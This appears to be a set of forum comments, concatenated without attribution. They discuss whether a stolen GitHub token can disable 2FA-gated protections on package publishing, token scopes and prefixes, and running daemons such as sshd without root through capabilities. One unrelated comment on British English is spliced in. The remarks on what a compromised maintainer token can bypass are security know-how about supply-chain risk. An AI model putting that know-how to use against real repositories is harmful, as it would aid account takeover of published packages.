There is no gate you can put on a Trusted Publisher setup in github which requires 2fa to remove. Full stop. 2fa on github gates some actions, but with a token with the right scope you can just disable the gating of workflow-runs-on-approve, branch protection, anything besides I think repo deletion and renaming.
And in my experience most maintainers will have repo admin perms by nature of the maintainer team being small and high trust. Your point is well taken, however, that said stolen token does need to have high enough privileges. But if you are the lead maintainer of your project, your gh token just comes with admin on your repo scope.
Many package managers require sudo, sure, but there is no good reason for them to in a modern linux system, and not all require this.
Even with systemd, you can use systemd --user.
You do not need root to do anything in Linux these days anyway between Namespaces and Capabilities so there is really no reason for root to be accessible at all or have any processes running as root post boot.
It makes me think of another similar one: I've noticed that British English speakers will say e.g. "the new iPhone will be available from September 20th"
To my ears that sounds like it's missing an “onwards” after it (or “starting September 20th” would sound even more natural).
https://docs.github.com/en/rest/actions/workflow-runs?apiVer...
Also for a Pending Deployment: https://docs.github.com/en/rest/actions/workflow-runs#review...
Both of these need `repo` scope, which you can avoid giving on org-level repos. For fine-grained tokens: "Deployments" repository permissions (write) is needed, which I wouldn't usually give to a token.
Critical severity vulnerabilities are only critical when they are reachable, but are completely meaningless if your application doesn't touch that code at all. It's objectively more risky to "patch" those by updating dependencies than just let them be there.
What upthread is talking about is the Github CLI app, `gh`; it doesn't use a fine-grained tokens, it uses OAuth app tokens. I.e., if you look at fine grain tokens (Setting → Developer settings → Personal access tokens → Fine-grained token), you will not see anything corresponding to `gh` there, as it does not use that form of authentication. It is under Settings → Applications → Authorized OAuth Apps as "Github CLI".
I just ran through the login sequence to double-check, but the permissions you grant it are not configurable during the login sequence, and it requests an all-encompassing token, as the upthread suggests.
Another way to come at this is to look at the token itself: gh's token is prefixed with `gho_` (the prefix for such OAuth apps), and fine-grained tokens are prefixed with `github_pat_` (sic)¹
¹(PATs are prefixed with `ghp_`, though I guess fine-grained tokens are also sometimes called fine-grain PATs… so, maybe the prefix is sensible.)
setcap 'cap_net_bind_service=+ep' /usr/sbin/sshd
Could even run it as a daemon unprivileged from a home directory with "systemd --user"
That said if you have multiple users and want every user to have their own sshd reachable on port 22 on the same machine you probably want to listen on vhost namespaced unix sockets and have something like haproxy listen on port 22 instead. Haproxy could of course also run unprivileged provided it has read access to all the sockets.
Issue is that it increases friction and you need sudo anyways to set the capabilities.
Most web servers would happy to run unprivileged with only CAP_NET_BIND_SERVICE
The bigger issue is that if you want to install or update system-wide packages, many of those will be used by privileged processes. Suppose you want to update /bin/sh. Even if the only permission you had is to write binaries, that'll get you root.
The only things I tend to have running at the system level are a kernel and init and maybe openssh.